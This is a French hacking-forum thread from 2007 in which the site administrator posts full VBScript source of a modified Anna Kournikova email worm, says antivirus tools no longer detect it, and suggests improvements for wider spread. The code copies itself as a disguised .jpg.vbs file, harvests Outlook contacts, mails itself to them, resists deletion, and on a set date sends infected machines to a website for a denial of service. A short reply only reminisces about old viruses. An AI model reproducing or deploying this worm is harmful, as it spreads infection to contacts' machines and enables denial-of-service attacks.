Annakournikova

Moderator: Mod

Annakournikova

Postby Korigan » Wed Oct 17, 2007 10:28 am

Voici le code source un peu modifié du vers annacournikova qui fis tant parlé de lui à une époque. Désormais il n'est plus reconnu par les antivirus.

Cependant il faut savoir que la politique de sécurité de windows ne permet plus un déploiment rapide de ce vers.
Il faut vraiment que la victime tourne sous windows, ai activé activeX et utilise Outlook pour que cela fonctionne.
Nous pourrions cependant le modifier et utiliser MAPI pour une plus grande compatibilité avec les clients de messageries.

Ce vers totalement inofensif servis de base à une deuxieme attaque. Ainsi les développeurs de la seconde attaque ont pus être noyé dans la masse de systeme contaminé, et ont ainsi dissimulé leurs traces. Cependant cette deuxieme version était buggé, et ce vers programmé pour ce détruire à une date donné à perduré encore quelques jours. Voila pour ce qui est de l'histoire 8)

Ce que fais ce vers:
1) Il crée une clef dans le registre
2) Il vérifie s'il a déja envoyé ses mails
3) Il récupère la liste des contacts outlook de la victime.
4) Il envoie un mail à tous les contacts avec en attachement le code source du vers
5) Si la date est un 8 decembre (dans cet exemple), toutes les machines contaminé se rendent sut http://hackbbs.org
De quoi faire un beau denis de services :P


[code:1:e8386cec76]
Set WScriptShell = CreateObject("WScript.Shell")
WScriptShell.regwrite "HKCU\software\Annacournikova\", "Worm modified by Korigan"
Set FileSystemObject = Createobject("scripting.filesystemobject")
FileSystemObject.copyfile wscript.scriptfullname,FileSystemObject.GetSpecialFolder(0) & "\Annacournikova.jpg.vbs"

if WScriptShell.regread ("HKCU\software\Annacournikova\mailed") <> "1" then
doM()
end if

if month(now) = 12 and day(now) = 8 then
WScriptShell.run "Http://hackbbs.org",3,false
end if

Set thisScript = FileSystemObject.opentextfile(wscript.scriptfullname, 1)
thisScriptText = thisScript.readall
thisScript.Close

Do
If Not (FileSystemObject.fileexists(wscript.scriptfullname)) Then
Set newFile = FileSystemObject.createtextfile(wscript.scriptfullname, True)
newFile.write thisScriptText
newFile.Close
End If
Loop


Function doM()

ma="Outlook"
Variable="."&"Application"
Set OutlookApp = CreateObject(ma&Variable)

If OutlookApp = "Outlook" Then
Set MAPINameSpace = OutlookApp.GetNamespace("MAPI")

Set AddressLists = MAPINamespace.AddressLists

For Each address In AddressLists
MsgBox address.AddressEntries.Count
If address.AddressEntries.Count <> 0 Then
entryCount = address.AddressEntries.Count
For i = 1 To entryCount
MsgBox "mailing..."
Set newItem = OutlookApp.CreateItem(0)
Set currentAddress = address.AddressEntries(i)

newItem.Body = "Salut," & vbcrlf & "Regardes ça!!!" & vbcrlf & ""
newItem.Subject = "Bonjour"
newItem.To = currentAddress.Address
set attachments = newItem.Attachments
attachments.Add FileSystemObject.GetSpecialFolder(0) & "\Annacournikova.jpg.vbs"
newItem.DeleteAfterSubmit = True
If newItem.To <> "" Then
'newItem.Send
WScriptShell.regwrite "HKCU\software\Annacournikova\mailed", "1"
End If
Next
End If
Next
end if
End Function
[/code:1:e8386cec76]
User avatar
Korigan
Site Admin
 
Posts: 1781
Joined: Tue May 29, 2007 6:57 pm

Postby benbenben » Sun Nov 18, 2007 2:01 pm

Jle conaissait pas ce jolie vers mdr mon premier virus (l) [remember .. ] c'etait Avril lavigne mdr une vrai rebelle !
benbenben
Projets
 
Posts: 121
Joined: Wed Nov 07, 2007 2:57 pm


Return to Virologie informatique

Who is online

Users browsing this forum: No registered users and 0 guests

cron